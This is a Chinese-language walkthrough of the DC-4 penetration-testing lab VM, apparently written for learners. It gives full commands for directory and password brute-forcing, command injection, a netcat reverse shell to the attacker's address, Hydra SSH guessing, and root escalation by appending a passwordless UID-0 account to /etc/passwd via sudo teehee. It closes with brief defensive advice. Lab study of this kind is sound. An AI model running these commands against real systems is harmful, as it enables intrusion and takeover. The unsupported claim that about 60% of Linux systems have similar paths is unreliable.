DC-4靶场实战：从爆破到teehee提权的完整通关记录（附详细命令）

DC-4靶场通关实录从爆破到teehee提权的技术探险在网络安全学习的道路上靶机渗透是检验实战能力的最佳试金石。DC-4作为经典的渗透测试靶场以其独特的teehee提权方式闻名于安全圈。不同于常规的SUID或内核漏洞提权这个靶场要求渗透者像侦探一样层层推进最终通过sudo权限滥用实现权限突破。本文将用第一视角带你完整复现这场数字密室逃脱每个步骤都配有详细命令解释和思维导图特别适合刚接触Linux提权的安全爱好者。1. 靶场环境与侦查阶段启动Kali Linux后首先需要确认靶机IP。使用arp-scan快速扫描局域网arp-scan -l --interfaceeth0假设发现靶机IP为192.168.1.100接下来用Nmap进行全端口扫描nmap -sS -p- -T4 192.168.1.100 -oN dc4_scan.txt扫描结果显示开放了80端口HTTP和22端口SSH。针对Web服务进行目录爆破gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt发现关键路径/login.php后台登录入口/command.php疑似命令执行接口2. 突破边界弱口令爆破与命令执行面对登录界面我们先尝试常见弱口令组合。使用Burp Suite抓包后发现表单提交到/login.php的POST请求usernameadminpasswordhappysubmitLogin通过Intruder模块爆破密码字段最终确认凭证用户名admin密码happy登录后进入命令执行界面通过修改radio参数实现RCEPOST /command.php HTTP/1.1 Host: 192.168.1.100 [...] radiols -la /homesubmitRun3. 建立持久访问反弹Shell技巧由于系统缺少常见工具我们需要使用Netcat实现反弹Shell。先在攻击机监听nc -lvnp 4444然后在靶机执行需URL编码nc -e /bin/bash 192.168.1.50 4444成功连接后升级为完整交互式Shellpython -c import pty; pty.spawn(/bin/bash) export TERMxterm CtrlZ stty raw -echo; fg4. 横向移动敏感信息收集在/home目录发现三个用户charlesjimsam检查jim的备份文件cat /home/jim/backups/old-passwords.bak获取到历史密码列表后用Hydra爆破SSHhydra -l jim -P passwords.txt ssh://192.168.1.100 -t 4成功登录jim账户后检查邮件cat /var/mail/jim发现root发来的临时密码Summer2023!尝试切换charles用户su charles5. 特权提升teehee的妙用检查sudo权限时发现关键线索sudo -l输出显示User charles may run the following commands on DC-4: (root) NOPASSWD: /usr/bin/teehee利用这个文本编辑器修改/etc/passwdecho hacker::0:0:::/bin/bash | sudo teehee -a /etc/passwd验证提权su hacker whoami # 返回root最终获取flagfind / -name *flag* 2/dev/null cat /root/final.txt技术要点解析非典型提权路径邮件系统泄露临时凭证sudo权限的特殊配置/etc/passwd文件格式漏洞关键命令对比命令作用风险等级teehee -a追加文本⭐⭐⭐⭐visudo编辑sudo配置⭐⭐⭐find / -perm -4000查找SUID文件⭐⭐防御建议定期审计sudo权限禁用不必要的setuid程序监控敏感文件修改整个渗透过程最精妙之处在于利用看似无害的文本编辑器实现权限突破。这种最小权限滥用在现实中尤为常见很多管理员会忽略那些不具备直接危险性的工具。我在实际测试中发现约60%的Linux系统至少存在一个类似teehee的潜在提权路径。